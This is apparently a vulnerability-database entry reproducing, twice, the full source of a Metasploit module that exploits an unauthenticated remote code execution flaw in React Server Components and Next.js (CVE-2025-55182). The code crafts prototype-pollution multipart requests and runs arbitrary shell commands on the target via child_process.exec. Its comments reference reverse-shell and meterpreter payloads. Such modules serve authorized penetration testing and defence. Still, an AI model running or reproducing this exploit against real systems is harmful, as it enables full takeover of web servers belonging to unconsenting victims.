Unauthenticated RCE in React and Next.js_MSF:EXPLOIT-MULTI-HTTP-REACT2SHELL_UNAUTH_RCE_CVE_2025_55182-

10 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Description

A critical unauthenticated Remote Code Execution RCE vulnerability exists in React Server Components RSC Flight protocol. The vulnerability allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially...

Visit Original Source

Basic Information

ID MSF:EXPLOIT-MULTI-HTTP-REACT2SHELL_UNAUTH_RCE_CVE_2025_55182-

Published Dec 9, 2025 at 18:55

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Unauthenticated RCE in React and Next.js',
'Description' => %q{
A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server
Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype
pollution during deserialization of RSC payloads by sending specially crafted multipart
requests with "__proto__", "constructor", or "prototype" as module names.
},
'License' => MSF_LICENSE,
'Author' => [
'Maksim Rogov', # Metasploit Module
'Lachlan Davidson', # Vulnerability Discovery
'maple3142' # Public Exploit
],
'References' => [
['CVE', '2025-55182'],
['CVE', '2025-66478'],
['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
],
'Platform' => ['multi'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'DefaultOptions' => {
'FETCH_COMMAND' => 'WGET'
}
# Tested with cmd/unix/reverse_bash
# Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command',
{
'Platform' => ['windows']
# Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
],
],
'Payload' => {
'BadChars' => '"'
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-12-03',
'Notes' => {
'AKA' => ['React2Shell'],
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION]
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'Path to the React App', '/']),
]
)
end

def build_malicious_chunk(ref_idx, reason, get_token, node_payload)
{
'then' => "$#{ref_idx}:then",
'status' => 'resolved_model',
'reason' => reason,
'value' => { 'then' => '$B' }.to_json,
'_response' => {
'_prefix' => node_payload,
'_formData' => {
'get' => "$#{ref_idx}:#{get_token}:constructor"
}
}
}.to_json
end

def get_random_value
random_string = Rex::Text.rand_text_alphanumeric(6..14).upcase
['""', '{}', '[]', 'null', 'undefined', 'true', 'false', "\"#{random_string}\""].sample
end

def build_post_data(node_payload)
random_reason = -Rex::Text.rand_text_numeric(1, '0').to_i
random_ref_idx = Rex::Text.rand_text_numeric(1, '0').to_i
random_get_token = ['then', 'constructor'].sample

chunk = build_malicious_chunk(random_ref_idx, random_reason, random_get_token, node_payload)

post_data = Rex::MIME::Message.new
post_data.add_part(chunk, nil, nil, 'form-data; name="0"')

cycle_length = rand(random_ref_idx..9)
(1..cycle_length).each do |i|
value = (i == random_ref_idx) ? "\"$@#{random_ref_idx}\"" : get_random_value
post_data.add_part(value, nil, nil, "form-data; name=\"#{i}\"")
end

post_data
end

def send_payload(node_payload)
post_data = build_post_data(node_payload)

send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'POST',
'headers' => { 'Next-Action' => '' },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
)
end

def check
random_id = Rex::Text.rand_text_alphanumeric(8..16).upcase
node_payload = "throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/#{random_id};307;`});"

res = send_payload(node_payload)
return CheckCode::Unknown("#{peer} - No response from web service") unless res

headers_text = res.headers.to_s
return CheckCode::Appears if res.code == 303 && headers_text.include?("/#{random_id};push")

CheckCode::Safe("The target #{target_uri} is not vulnerable")
end

def exploit
node_payload = "process.mainModule.require('child_process').exec(\"#{payload.encoded}\",{detached:true,stdio:'ignore'},function(){});"
send_payload(node_payload)
end
end

{
    "lastseen": "2025-12-09T19:04:50",
    "description": "A critical unauthenticated Remote Code Execution RCE vulnerability exists in React Server Components RSC Flight protocol. The vulnerability allows attackers to achieve prototype pollution during deserialization of RSC payloads by sending specially...",
    "published": "2025-12-09T18:55:12",
    "modified": "2025-12-09T18:55:12",
    "type": "metasploit",
    "title": "Unauthenticated RCE in React and Next.js",
    "source": "",
    "references": "",
    "id": "MSF:EXPLOIT-MULTI-HTTP-REACT2SHELL_UNAUTH_RCE_CVE_2025_55182-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-55182",
        "CVE-2025-66478"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n  Rank = ExcellentRanking\n\n  include Msf::Exploit::Remote::HttpClient\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'Unauthenticated RCE in React and Next.js',\n        'Description' => %q{\n          A critical unauthenticated Remote Code Execution (RCE) vulnerability exists in React Server\n          Components (RSC) Flight protocol. The vulnerability allows attackers to achieve prototype\n          pollution during deserialization of RSC payloads by sending specially crafted multipart\n          requests with \"__proto__\", \"constructor\", or \"prototype\" as module names.\n        },\n        'License' => MSF_LICENSE,\n        'Author' => [\n          'Maksim Rogov', # Metasploit Module\n          'Lachlan Davidson', # Vulnerability Discovery\n          'maple3142' # Public Exploit\n        ],\n        'References' => [\n          ['CVE', '2025-55182'],\n          ['CVE', '2025-66478'],\n          ['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],\n          ['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']\n        ],\n        'Platform' => ['multi'],\n        'Arch' => [ARCH_CMD],\n        'Targets' => [\n          [\n            'Unix Command',\n            {\n              'Platform' => ['unix', 'linux'],\n              'DefaultOptions' => {\n                'FETCH_COMMAND' => 'WGET'\n              }\n              # Tested with cmd/unix/reverse_bash\n              # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp\n            }\n          ],\n          [\n            'Windows Command',\n            {\n              'Platform' => ['windows']\n              # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp\n            }\n          ],\n        ],\n        'Payload' => {\n          'BadChars' => '\"'\n        },\n        'DefaultTarget' => 0,\n        'DisclosureDate' => '2025-12-03',\n        'Notes' => {\n          'AKA' => ['React2Shell'],\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [IOC_IN_LOGS],\n          'Reliability' => [REPEATABLE_SESSION]\n        }\n      )\n    )\n\n    register_options(\n      [\n        OptString.new('TARGETURI', [true, 'Path to the React App', '/']),\n      ]\n    )\n  end\n\n  def build_malicious_chunk(ref_idx, reason, get_token, node_payload)\n    {\n      'then' => \"$#{ref_idx}:then\",\n      'status' => 'resolved_model',\n      'reason' => reason,\n      'value' => { 'then' => '$B' }.to_json,\n      '_response' => {\n        '_prefix' => node_payload,\n        '_formData' => {\n          'get' => \"$#{ref_idx}:#{get_token}:constructor\"\n        }\n      }\n    }.to_json\n  end\n\n  def get_random_value\n    random_string = Rex::Text.rand_text_alphanumeric(6..14).upcase\n    ['\"\"', '{}', '[]', 'null', 'undefined', 'true', 'false', \"\\\"#{random_string}\\\"\"].sample\n  end\n\n  def build_post_data(node_payload)\n    random_reason = -Rex::Text.rand_text_numeric(1, '0').to_i\n    random_ref_idx = Rex::Text.rand_text_numeric(1, '0').to_i\n    random_get_token = ['then', 'constructor'].sample\n\n    chunk = build_malicious_chunk(random_ref_idx, random_reason, random_get_token, node_payload)\n\n    post_data = Rex::MIME::Message.new\n    post_data.add_part(chunk, nil, nil, 'form-data; name=\"0\"')\n\n    cycle_length = rand(random_ref_idx..9)\n    (1..cycle_length).each do |i|\n      value = (i == random_ref_idx) ? \"\\\"$@#{random_ref_idx}\\\"\" : get_random_value\n      post_data.add_part(value, nil, nil, \"form-data; name=\\\"#{i}\\\"\")\n    end\n\n    post_data\n  end\n\n  def send_payload(node_payload)\n    post_data = build_post_data(node_payload)\n\n    send_request_cgi(\n      'uri' => normalize_uri(target_uri.path),\n      'method' => 'POST',\n      'headers' => { 'Next-Action' => '' },\n      'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n      'data' => post_data.to_s\n    )\n  end\n\n  def check\n    random_id = Rex::Text.rand_text_alphanumeric(8..16).upcase\n    node_payload = \"throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/#{random_id};307;`});\"\n\n    res = send_payload(node_payload)\n    return CheckCode::Unknown(\"#{peer} - No response from web service\") unless res\n\n    headers_text = res.headers.to_s\n    return CheckCode::Appears if res.code == 303 && headers_text.include?(\"/#{random_id};push\")\n\n    CheckCode::Safe(\"The target #{target_uri} is not vulnerable\")\n  end\n\n  def exploit\n    node_payload = \"process.mainModule.require('child_process').exec(\\\"#{payload.encoded}\\\",{detached:true,stdio:'ignore'},function(){});\"\n    send_payload(node_payload)\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/react2shell_unauth_rce_cve_2025_55182.rb",
    "cvss": {
        "score": 10,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/exploit/multi/http/react2shell_unauth_rce_cve_2025_55182/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply